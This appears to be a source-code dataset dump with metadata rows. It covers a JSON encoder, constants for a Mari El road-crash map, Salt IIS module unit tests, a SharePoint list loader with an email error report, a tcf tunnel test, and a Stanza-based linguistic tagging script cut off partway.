return json.JSONEncoder.default(self, o)
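# --- Added usage sketch ------------------------------------------------------
# The encoder plugs into the standard library through the `cls` argument of
# json.dumps; the payload values below exercise the extra branches handled
# above and rely only on the imports at the top of this module.
if __name__ == '__main__':
    payload = {
        'path': pathlib.Path('/tmp') / 'report.csv',
        'id': uuid.uuid4(),
        'when': datetime.datetime(2021, 1, 2, 3, 4, 5),
        'duration': datetime.timedelta(minutes=90),
        'amount': decimal.Decimal('19.99'),
        'z': complex(1, 2),
    }
    print(json.dumps(payload, cls=JSONEncoder, indent=2))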
| 27.128205
| 88
| 0.618147
| 921
| 0.87051
| 0
| 0
| 0
| 0
| 0
| 0
| 307
| 0.29017
|
b29e7d32ca4c3f659315bd72acd899c4542a2363
| 1,960
|
py
|
Python
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | 1
|
2019-04-04T21:55:24.000Z
|
2019-04-04T21:55:24.000Z
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | 2
|
2019-04-14T10:11:25.000Z
|
2019-04-25T20:49:54.000Z
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# input data constants
MARI_EL = 'Республика Марий Эл'
YOSHKAR_OLA = 'Республика Марий Эл, Йошкар-Ола'
VOLZHSK = 'Республика Марий Эл, Волжск'
VOLZHSK_ADM = 'Республика Марий Эл, Волжский район'
MOUNTIN = 'Республика Марий Эл, Горномарийский район'
ZVENIGOVO = 'Республика Марий Эл, Звениговский район'
KILEMARY = 'Республика Марий Эл, Килемарский район'
KUZHENER = 'Республика Марий Эл, Куженерский район'
TUREK = 'Республика Марий Эл, Мари-Турекский район'
MEDVEDEVO = 'Республика Марий Эл, Медведевский район'
MORKI = 'Республика Марий Эл, Моркинский район'
NEW_TORYAL = 'Республика Марий Эл, Новоторъяльский район'
ORSHANKA = 'Республика Марий Эл, Оршанский район'
PARANGA = 'Республика Марий Эл, Параньгинский район'
SERNUR = 'Республика Марий Эл, Сернурский район'
SOVETSKIY = 'Республика Марий Эл, Советский район'
YURINO = 'Республика Марий Эл, Юринский район'
ADMINISTRATIVE = [YOSHKAR_OLA, VOLZHSK, VOLZHSK_ADM, MOUNTIN, ZVENIGOVO, KILEMARY, KUZHENER, TUREK, MEDVEDEVO, MORKI, NEW_TORYAL, ORSHANKA, PARANGA, SERNUR, SOVETSKIY, YURINO]
# data indices
DATE = 0
TIME = 1
TYPE = 2
LOCATION = 3
STREET = 4
HOUSE_NUMBER = 5
ROAD = 6
KILOMETER = 7
METER = 8
LONGITUDE = 9
LATITUDE = 10
DEATH = 11
DEATH_CHILDREN = 12
INJURY = 13
INJURY_CHILDREN = 14
LONGITUDE_GEOCODE = 15
LATITUDE_GEOCODE = 16
VALID = 17
VALID_STRICT = 18
STREET_REPLACE_DICTIONARY = {
'Кырля': 'Кырли',
'Ленина пр-кт': 'Ленинский проспект',
'Ленина пл': 'Ленинский проспект',
'Л.Шевцовой': 'Шевцовой',
'Панфилова пер': 'Панфилова улица',
'Комсомольская пл': 'Комсомольская ул',
'Маркса пер': 'Маркса ул'
}
# coordinates grid borders
MARI_EL_WEST = 45.619745
MARI_EL_EAST = 50.200041
MARI_EL_SOUTH = 55.830512
MARI_EL_NORTH = 57.343631
YOSHKAR_OLA_WEST = 47.823484
YOSHKAR_OLA_EAST = 47.972560
YOSHKAR_OLA_SOUTH = 56.603073
YOSHKAR_OLA_NORTH = 56.669722
EARTH_MEAN_RADIUS = 6371000
MAX_DISTANCE = 150
# Yandex API constants
HOUSE_YANDEX = 'house'
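# --- Added illustration (hedged) ---------------------------------------------
# One plausible use of the grid borders, EARTH_MEAN_RADIUS and MAX_DISTANCE
# defined above: a bounding-box check plus a haversine distance for validating
# geocoded crash coordinates. The function names are hypothetical and not part
# of the original module.
import math

def inside_mari_el(longitude, latitude):
    return (MARI_EL_WEST <= longitude <= MARI_EL_EAST
            and MARI_EL_SOUTH <= latitude <= MARI_EL_NORTH)

def haversine_m(lon1, lat1, lon2, lat2):
    # great-circle distance in metres on a sphere of radius EARTH_MEAN_RADIUS
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_MEAN_RADIUS * math.asin(math.sqrt(a))

def geocode_is_plausible(lon, lat, lon_geo, lat_geo):
    # accept a geocoded point only if it lies within MAX_DISTANCE metres
    return haversine_m(lon, lat, lon_geo, lat_geo) <= MAX_DISTANCE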
| 26.849315
| 175
| 0.758673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,626
| 0.615676
|
b29fec21f725de737210b497e78b6e2a1d2273be
| 7,195
|
py
|
Python
|
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | 1
|
2018-09-19T22:42:54.000Z
|
2018-09-19T22:42:54.000Z
|
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | 1
|
2019-07-23T13:42:23.000Z
|
2019-07-23T13:42:23.000Z
|
# -*- coding: utf-8 -*-
'''
:synopsis: Unit Tests for Windows IIS Module 'module.win_iis'
:platform: Windows
:maturity: develop
versionadded:: Carbon
'''
# Import Python Libs
from __future__ import absolute_import
import json
# Import Salt Libs
from salt.exceptions import SaltInvocationError
from salt.modules import win_iis
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON,
)
ensure_in_syspath('../../')
# Globals
win_iis.__salt__ = {}
# Make sure this module runs on Windows system
HAS_IIS = win_iis.__virtual__()
@skipIf(not HAS_IIS, 'This test case runs only on Windows systems')
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinIisTestCase(TestCase):
'''
Test cases for salt.modules.win_iis
'''
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_apppool(self):
'''
Test - Create an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'name': 'MyTestPool', 'state': 'Started',
'Applications': {'value': ['MyTestSite'],
'Count': 1}}])}))
def test_list_apppools(self):
'''
Test - List all configured IIS application pools.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apppools(), dict)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value={'MyTestPool': {
'applications': list(),
'state': 'Started'}}))
def test_remove_apppool(self):
'''
Test - Remove an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
def test_restart_apppool(self):
'''
Test - Restart an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.restart_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site(self):
'''
Test - Create a basic website in IIS.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'http'}
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_site(**kwargs))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site_failed(self):
'''
Test - Create a basic website in IIS using invalid data.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'invalid-protocol-name'}
with patch.dict(win_iis.__salt__):
self.assertRaises(SaltInvocationError, win_iis.create_site, **kwargs)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_remove_site(self):
'''
Test - Delete a website from IIS.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_site('MyTestSite'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'applicationPool': 'MyTestPool',
'name': 'testApp', 'path': '/testApp',
'PhysicalPath': r'C:\inetpub\apps\testApp',
'preloadEnabled': False,
'protocols': 'http'}])}))
def test_list_apps(self):
'''
Test - Get all configured IIS applications for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apps('MyTestSite'), dict)
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_list_bindings(self):
'''
Test - Get all configured IIS bindings for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_bindings('MyTestSite'), dict)
if __name__ == '__main__':
from integration import run_tests # pylint: disable=import-error
run_tests(WinIisTestCase, needs_daemon=False)
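# --- Added illustration (hedged, not part of the Salt test suite) ------------
# The decorator pattern used throughout WinIisTestCase, shown on a neutral
# target: a stacked @patch swaps in the given MagicMock only for the duration
# of the decorated test method, which is how win_iis._srvmgr is replaced by a
# canned {'retcode': 0} result above without touching a real IIS server.
# TestCase, MagicMock, patch and json are the objects already imported at the
# top of this module.
class PatchPatternExample(TestCase):
    @patch('json.dumps', MagicMock(return_value='{"retcode": 0}'))
    def test_patched_dumps(self):
        # inside the test body, json.dumps is the MagicMock from the decorator
        self.assertEqual(json.dumps({'anything': 'at all'}), '{"retcode": 0}')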
| 40.421348
| 88
| 0.522168
| 6,245
| 0.867964
| 0
| 0
| 6,346
| 0.882001
| 0
| 0
| 2,683
| 0.372898
|
b2a0afa260118cc81d83a6eee84100a7f5b452a7
| 6,217
|
py
|
Python
|
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | null | null | null |
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | 4
|
2020-09-18T09:58:14.000Z
|
2021-12-13T20:47:39.000Z
|
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Loader_to_sharepoint.py
#
#
from pathlib import Path
import os.path
import requests,json,urllib
import pandas as pd
import collections
from collections import defaultdict
import xmltodict
import getpass
from shareplum import Office365
from shareplum.site import Version
from shareplum import Site
from requests_ntlm import HttpNtlmAuth
import smtplib
import email
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from email.mime.text import MIMEText
from email.message import EmailMessage
import pprint
# print("\nEnter Your MS ID: ")
MSID = input("\nEnter Your MS ID: ")
# print("\nEnter MS Password: ")
MSID_password = getpass.getpass("\nEnter MS Password: ")
url1="http://server.com/sites/Lists/MIA%20Testing/AllItems.aspx"
url2="http://server.com/sites/Lists/MIS%20MIA%20testing/AllItems.aspx"
head={'Accept': "application/json",'content-type': "application/json;odata=verbose", "X-HTTP-Method": "MERGE"}
# headers = {'Accept': "application/json",'content-type': "application/json;odata=verbose", 'X-RequestDigest': form_digest, "X-HTTP-Method": "MERGE"}
# "X-RequestDigest": digest_value}
##"DOMAIN\username",password
cred=HttpNtlmAuth(MSID, MSID_password)
#cred=HttpNtlmAuth("jsmith", "")
def decom_load():
# authcookie = Office365('https://jsmith.sharepoint.com/teams/project_name', username='jsmith@smith.com',
# password='').GetCookies()
# site365 = Site('https://company.sharepoint.com', version=Version.v2016, authcookie=authcookie)
# site365 = Site('https://company.sharepoint.com/teams/project', version=Version.v2016, authcookie=authcookie)
# site.AddList('decommission apps', description='Great List!', template_id='Custom List')
# try:
site = Site('http://server.com/sites/project', auth=cred)
sp_list = site.List("project apps")
sp_data = sp_list.GetListItems('All Items')
with open('output2.json', 'rb') as file1:
decom=json.load(file1)
all_decom=decom["decommRequests"]
update_data = []
pc_error_data = []
#cr="\n"
for decom_row in all_decom: # Getting each row data from the API file output2.json
decom_col=decom_row["Global ID"] # get the ID only
fields = ['ID','Global ID']
query = {'Where': [('Eq', 'Global ID', decom_col)]} # query amd fetch matching rows in the ED SHarepoint DB
spt_data = sp_list.GetListItems(fields=fields, query=query) # store matching records in SHAREPOINT
pd_data=""
pd_all_decom=pd.DataFrame(all_decom)
pd_data=pd.DataFrame(spt_data) ####. DATAFRAME OF MATCHING SHAREPOINT ###
for SP_id in spt_data: # SHAREPOINT ID matched
if SP_id['Global ID'] == decom_row["Global ID"]:
decom_row.update({"ID": SP_id['ID']})
update_data.append(decom_row)
sp_list.UpdateListItems(data=update_data, kind='Update')
print("updating:", SP_id['Global ID'])
if decom_row not in update_data:
print(decom_row)
new_records = []
new_records.append(decom_row)
#sp_list.UpdateListItems(data=new_records, kind='New')
try:
sp_list.UpdateListItems(data=new_records, kind='New')
except KeyError as e:
#PC_user=(decom_row["Primary Contact"])
pc_error_data.append(decom_row)
# pc_error_data.append(e.args)
#print(PC_user)
print(e.args)
#emailer(PC_user)
Path('/tmp/ifr.txt').touch()
#emailer(pc_error_data)
if os.path.isfile('/tmp/ifr.txt'):
print ("Incorrect records emailed")
emailer(pc_error_data)
os.remove("/tmp/ifr.txt")
else:
print ("No errors")
#except: #except OSError as e:
#print(e)
# print(PC_user)
#PC_user=decom_row["Primary Contact"]
#print(PC_user)
#emailer(PC_user)
# PC_user=decom_row["Primary Contact"]
def decom_update():
site = Site('http://server.com/sites/project', auth=cred)
sp_list = site.List("decommission apps")
id_var=input("Enter the global ID")
fields = ['ID', 'Global ID']
    query = {'Where': [('Eq', 'Global ID', id_var)]}  # filter on the Global ID entered above
sp_data = sp_list.GetListItems(fields=fields, query=query)
print(sp_data)
for i in sp_data:
print(i['ID'])
var1=i['ID']
print(var1)
var2='"ID":"'
print(var2)
var3='"'
print(var3)
row = var2 + var1 + var3
print(row)
def emailer(pc_error_data):
print("starting email")
msg = MIMEMultipart()
sender = "jsmith@smith.com"
recipients = "jsmith@smtih.com"
server=smtplib.SMTP('mailo2.server.com')
msg['Subject']=f'project loading issues'
msg['From']=sender
msg['To']=recipients
#form_ped=print(str(pc_error_data).strip('[]'))
#print(form_ped)
#pprint.pc_error_data
# Create the body of the message (a plain-text and an HTML version).
text =(f"Hi {MSID}, "
+"\n========================\n"
+f"loading issues encountered.\n"
+f"\n please investigate any issues.\n"
+f"\nWe found no record for the users ..\n"
+f"\n{pc_error_data}\n"
+f"\n in Sharepoint.\n"
+f"So most likely updates are required.")
part1 = MIMEText(text, 'plain')
msg.attach(part1)
server.sendmail(sender, recipients.split(","), msg.as_string())
server.quit()
print("completing email")
if __name__ == '__main__':
decom_load()
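# --- Added illustration (hedged, hypothetical values) ------------------------
# The minimal shareplum + NTLM flow this script builds on: authenticate with a
# DOMAIN\user credential, open a list, query rows on a field and push updates.
# Server URL, list name and field names below are placeholders, mirroring the
# calls already used in decom_load() above.
def update_rows_by_global_id(global_id, new_values):
    auth = HttpNtlmAuth('DOMAIN\\jsmith', 'password')
    sp_site = Site('http://server.com/sites/project', auth=auth)
    sp_list = sp_site.List('project apps')
    rows = sp_list.GetListItems(fields=['ID', 'Global ID'],
                                query={'Where': [('Eq', 'Global ID', global_id)]})
    updates = [dict(new_values, ID=row['ID']) for row in rows]
    if updates:
        sp_list.UpdateListItems(data=updates, kind='Update')
    return updates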
| 32.89418
| 149
| 0.579379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,648
| 0.425929
|
b2a1766bc5fbc87d90f9559b3c26e49052f3b261
| 869
|
py
|
Python
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 24
|
2018-08-21T18:04:48.000Z
|
2022-02-07T22:50:06.000Z
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 16
|
2018-08-21T18:03:52.000Z
|
2022-03-01T17:15:42.000Z
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 29
|
2018-08-22T19:40:59.000Z
|
2021-12-21T11:13:23.000Z
|
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
# pylint: disable = missing-docstring
import os
import socket
import commonl.testing
import tcfl
import tcfl.tc
srcdir = os.path.dirname(__file__)
ttbd = commonl.testing.test_ttbd(config_files = [
# strip to remove the compiled/optimized version -> get source
os.path.join(srcdir, "conf_%s" % os.path.basename(__file__.rstrip('cd')))
])
@tcfl.tc.target(ttbd.url_spec)
class release_hooks(tcfl.tc.tc_c):
"""
We allocate a target, create tunnels and then we release it; when
released, the tunnels are destroyed.
"""
def eval(self, target):
target.tunnel.add(22, "127.0.0.1", 'tcp')
self.report_pass("release hooks were called on target release")
def teardown_90_scb(self):
ttbd.check_log_for_issues(self)
| 24.138889
| 77
| 0.700806
| 384
| 0.441887
| 0
| 0
| 415
| 0.47756
| 0
| 0
| 392
| 0.451093
|
b2a18a1d5893e676f4cfbf5555c659a91725ab53
| 52,309
|
py
|
Python
|
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
import glob,os,stanza,argparse
from datetime import datetime
# directory path initialization
directory_path = os.getcwd()
#stanford tagger initiation
nlp = stanza.Pipeline('en')
dimDict ={}
# type specifiers
have = ["have","has","'ve","had","having","hath"]
do = ["do","does","did","doing","done"]
wp = ["who","whom","whose","which"]
be = ["be","am","is","are","was","were","been","being","'s","'m","'re"]
who = ["what","where","when","how","whether","why","whoever","whomever","whichever","wherever","whenever","whatever","however"]
preposition = ["against","amid","amidst","among","amongst","at","besides","between","by","despite","during","except","for","from","in","into","minus","notwithstanding","of","off","on","onto","opposite","out","per","plus","pro","than","through","throughout","thru","toward","towards","upon","versus","via","with","within","without"]
public = ["acknowledge","acknowledged","acknowledges","acknowledging","add","adds","adding","added","admit","admits","admitting","admitted","affirm","affirms","affirming","affirmed","agree","agrees","agreeing","agreed","allege","alleges","alleging","alleged","announce","announces","announcing","announced","argue","argues","arguing","argued","assert","asserts","asserting","asserted","bet","bets","betting","boast","boasts","boasting","boasted","certify","certifies","certifying","certified","claim","claims","claiming","claimed","comment","comments","commenting","commented","complain","complains","complaining","complained","concede","concedes","conceding","conceded","confess","confesses","confessing","confessed","confide","confides","confiding","confided","confirm","confirms","confirming","confirmed","contend","contends","contending","contended","convey","conveys","conveying","conveyed","declare","declares","declaring","declared","deny","denies","denying","denied","disclose","discloses","disclosing","disclosed","exclaim","exclaims","exclaiming","exclaimed","explain","explains","explaining","explained","forecast","forecasts","forecasting","forecasted","foretell","foretells","foretelling","foretold","guarantee","guarantees","guaranteeing","guaranteed","hint","hints","hinting","hinted","insist","insists","insisting","insisted","maintain","maintains","maintaining","maintained","mention","mentions","mentioning","mentioned","object","objects","objecting","objected","predict","predicts","predicting","predicted","proclaim","proclaims","proclaiming","proclaimed","promise","promises","promising","promised","pronounce","pronounces","pronouncing","pronounced","prophesy","prophesies","prophesying","prophesied","protest","protests","protesting","protested","remark","remarks","remarking","remarked","repeat","repeats","repeating","repeated","reply","replies","replying","replied","report","reports","reporting","reported","say","says","saying","said","state","states","stating","stated","submit","submits","submitting","submitted","suggest","suggests","suggesting","suggested","swear","swears","swearing","swore","sworn","testify","testifies","testifying","testified","vow","vows","vowing","vowed","warn","warns","warning","warned","write","writes","writing","wrote","written"]
private = ["accept","accepts","accepting","accepted","anticipate","anticipates","anticipating","anticipated","ascertain","ascertains","ascertaining","ascertained","assume","assumes","assuming","assumed","believe","believes","believing","believed","calculate","calculates","calculating","calculated","check","checks","checking","checked","conclude","concludes","concluding","concluded","conjecture","conjectures","conjecturing","conjectured","consider","considers","considering","considered","decide","decides","deciding","decided","deduce","deduces","deducing","deduced","deem","deems","deeming","deemed","demonstrate","demonstrates","demonstrating","demonstrated","determine","determines","determining","determined","discern","discerns","discerning","discerned","discover","discovers","discovering","discovered","doubt","doubts","doubting","doubted","dream","dreams","dreaming","dreamt","dreamed","ensure","ensures","ensuring","ensured","establish","establishes","establishing","established","estimate","estimates","estimating","estimated","expect","expects","expecting","expected","fancy","fancies","fancying","fancied","fear","fears","fearing","feared","feel","feels","feeling","felt","find","finds","finding","found","foresee","foresees","foreseeing","foresaw","forget","forgets","forgetting","forgot","forgotten","gather","gathers","gathering","gathered","guess","guesses","guessing","guessed","hear","hears","hearing","heard","hold","holds","holding","held","hope","hopes","hoping","hoped","imagine","imagines","imagining","imagined","imply","implies","implying","implied","indicate","indicates","indicating","indicated","infer","infers","inferring","inferred","insure","insures","insuring","insured","judge","judges","judging","judged","know","knows","knowing","knew","known","learn","learns","learning","learnt","learned","mean","means","meaning","meant","note","notes","noting","noted","notice","notices","noticing","noticed","observe","observes","observing","observed","perceive","perceives","perceiving","perceived","presume","presumes","presuming","presumed","presuppose","presupposes","presupposing","presupposed","pretend","pretend","pretending","pretended","prove","proves","proving","proved","realize","realise","realising","realizing","realises","realizes","realised","realized","reason","reasons","reasoning","reasoned","recall","recalls","recalling","recalled","reckon","reckons","reckoning","reckoned","recognize","recognise","recognizes","recognises","recognizing","recognising","recognized","recognised","reflect","reflects","reflecting","reflected","remember","remembers","remembering","remembered","reveal","reveals","revealing","revealed","see","sees","seeing","saw","seen","sense","senses","sensing","sensed","show","shows","showing","showed","shown","signify","signifies","signifying","signified","suppose","supposes","supposing","supposed","suspect","suspects","suspecting","suspected","think","thinks","thinking","thought","understand","understands","understanding","understood"]
suasive = ["agree","agrees","agreeing","agreed","allow","allows","allowing","allowed","arrange","arranges","arranging","arranged","ask","asks","asking","asked","beg","begs","begging","begged","command","commands","commanding","commanded","concede","concedes","conceding","conceded","decide","decides","deciding","decided","decree","decrees","decreeing","decreed","demand","demands","demanding","demanded","desire","desires","desiring","desired","determine","determines","determining","determined","enjoin","enjoins","enjoining","enjoined","ensure","ensures","ensuring","ensured","entreat","entreats","entreating","entreated","grant","grants","granting","granted","insist","insists","insisting","insisted","instruct","instructs","instructing","instructed","intend","intends","intending","intended","move","moves","moving","moved","ordain","ordains","ordaining","ordained","order","orders","ordering","ordered","pledge","pledges","pledging","pledged","pray","prays","praying","prayed","prefer","prefers","preferring","preferred","pronounce","pronounces","pronouncing","pronounced","propose","proposes","proposing","proposed","recommend","recommends","recommending","recommended","request","requests","requesting","requested","require","requires","requiring","required","resolve","resolves","resolving","resolved","rule","rules","ruling","ruled","stipulate","stipulates","stipulating","stipulated","suggest","suggests","suggesting","suggested","urge","urges","urging","urged","vote","votes","voting","voted"]
symbols = [",",".","!","@","#","$","%","^","&","*","(",")","<",">","/","?","{","}","[","]","\\","|","-","+","=","~","`"]
indefinitePN = ["anybody","anyone","anything","everybody","everyone","everything","nobody","none","nothing","nowhere","somebody","someone","something"]
quantifier = ["each","all","every","many","much","few","several","some","any"]
quantifierPN = ["everybody","somebody","anybody","everyone","someone","anyone","everything","something","anything"]
conjunctives = ["alternatively","consequently","conversely","eg","e.g.","furthermore","hence","however","i.e.","instead","likewise","moreover","namely","nevertheless","nonetheless","notwithstanding","otherwise","similarly","therefore","thus","viz."]
timeABV = ["afterwards","again","earlier","early","eventually","formerly","immediately","initially","instantly","late","lately","later","momentarily","now","nowadays","once","originally","presently","previously","recently","shortly","simultaneously","subsequently","today","to-day","tomorrow","to-morrow","tonight","to-night","yesterday"]
placeABV = ["aboard","above","abroad","across","ahead","alongside","around","ashore","astern","away","behind","below","beneath","beside","downhill","downstairs","downstream","east","far","hereabouts","indoors","inland","inshore","inside","locally","near","nearby","north","nowhere","outdoors","outside","overboard","overland","overseas","south","underfoot","underground","underneath","uphill","upstairs","upstream","west"]
narrative = ["ask","asks","asked","asking","tell","tells","told","telling"]
# tag specifiers
v = ["VBG","VBN","VB","VBD","VBP","VBZ"]
nn = ["NN","NNP","NNPS","NNS"]
def printWithTime(Strr):
now=datetime.now()
dt = now.strftime("%Y-%m-%d %H:%M:%S")
print(dt+" INFO: "+Strr)
def tagger(data,file,frags):
printWithTime(" Creating Stanford Tags....")
doc = nlp(data)
printWithTime(" Finished")
stftoutfilepath = os.path.join(directory_path,'Results')
tagoutfilepath = os.path.join(directory_path,'Results')
if frags == True:
stftoutfilepath = os.path.join(stftoutfilepath,'StanfordTagsFragment')
tagoutfilepath = os.path.join(tagoutfilepath,'ModifiedTagsFragment')
else:
stftoutfilepath = os.path.join(stftoutfilepath,'StanfordTags')
tagoutfilepath = os.path.join(tagoutfilepath,'ModifiedTags')
stftoutfilepath = os.path.join(stftoutfilepath,file)
tagoutfilepath = os.path.join(tagoutfilepath,file)
out = open(stftoutfilepath,'w')
dout = open(tagoutfilepath,'w')
printWithTime(" Generating Analyzed Tags...")
for i,sent in enumerate(doc.sentences):
linewords=[]
for word in sent.words:
outstr = f'{word.text}_{word.xpos}\n'
linewords.append(f'{word.text}_{word.xpos}')
out.write(outstr)
taglist = taggerAnalyzer(linewords)
for tags in taglist:
dout.write(tags+"\n")
printWithTime(" Finished")
out.close()
dout.close()
return
def getFinishedFiles(t):
returnList =[]
if t == "merged":
if not os.path.exists(os.path.join(directory_path,'mList.txt')):
return returnList
else:
path = os.path.join(directory_path,'mList.txt')
with open(path,'r') as infile:
for line in infile:
returnList.append(line.replace('\n',''))
return returnList
elif t == "fragment":
if not os.path.exists(os.path.join(directory_path,'fList.txt')):
return returnList
else:
path = os.path.join(directory_path,'fList.txt')
with open(path,'r') as infile:
for line in infile:
returnList.append(line.replace('\n',''))
return returnList
else:
return returnList
def MergedfolderProcess():
#print('folderprocess called')
if not os.path.exists('MergedFiles'):
printWithTime('Error: Please use FileMerger.py to generate file data first')
return []
else:
os.chdir(os.path.join(directory_path,'MergedFiles'))
filenames = glob.glob('*.txt')
validnames =[]
for name in filenames:
validnames.append(name)
#print(validnames)
return validnames
def FragmentfolderProcess():
if not os.path.exists('FileFragments'):
printWithTime('Error: Please use FileMerger.py to generate file data first')
return []
else:
os.chdir(os.path.join(directory_path,'FileFragments'))
filenames=glob.glob('*.txt')
validnames = []
for name in filenames:
validnames.append(name)
return validnames
def taggerAnalyzer(wordList):
#first loop to define prepositions
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
if(word[0].lower()=="to" and (next_word[0] in wp or any(n in next_word for n in ["IN","CD","DT","JJ","PRPS","WPS","NN","NNP","PDT","PRP","WDT","WRB"]))):
wordList[i] = word[0] + "_PIN"
#second loop to define simple types
for i in range(len(wordList)):
word = wordList[i].split('_')
# negation
if("not" in word[0] or "n't" in word[0]) and "RB" in wordList[i]:
wordList[i] = word[0] + "_XX0"
# preposition
if word[0] in preposition:
wordList[i] = word[0] + "_PIN"
#indefinite pronouns
if word[0] in indefinitePN:
wordList[i] = word[0] + "_INPR"
#quantifier
if word[0] in quantifier:
wordList[i] = word[0] + "_QUAN"
#quantifier pronouns
if word[0] in quantifierPN:
wordList[i] = word[0] + "_QUPR"
# third loop to define complex types
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-4:
fourth_next_word = wordList[i+4].split('_')
else:
fourth_next_word = ['','NULL']
if i<len(wordList)-3:
third_next_word = wordList[i+3].split('_')
else:
third_next_word = ['','NULL']
if i<len(wordList)-2:
second_next_word = wordList[i+2].split('_')
else:
second_next_word = ['','NULL']
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
